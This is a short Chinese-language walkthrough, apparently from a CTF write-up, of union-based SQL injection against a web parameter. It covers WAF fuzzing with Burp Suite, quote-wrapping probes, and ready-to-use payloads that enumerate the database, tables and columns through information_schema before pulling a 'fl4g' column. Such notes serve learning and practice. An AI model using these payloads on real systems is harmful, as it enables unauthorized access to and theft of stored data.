步骤:

1
2
3
#1.导入爆破,测试WAF

#使用BP测试
1
2
3
4
5
6
7
#2.测试包裹

1   #无包裹
1'  
1"
1')
1")
1
2
3
4
5
6
7
8
9
#3.测试隐藏过滤

show database()
1;SET
order by 3
union select 123

#这些组合起来测试,有可能存在隐藏WAF
#有可能双写之类的
1
?id=1' order by 3--+ 					#进行基础语句测试时候,#不行的时候,可以换成--+试试看
1
2
3
4
5
6
7
8
?id=-1' union select 1,database(),3 --+					#查库

?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+							  #查表

?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='fl4g'--+									#查列

?id=-4' union select 1,database(), group_concat(fllllag) from fl4g --+
#查询
backtop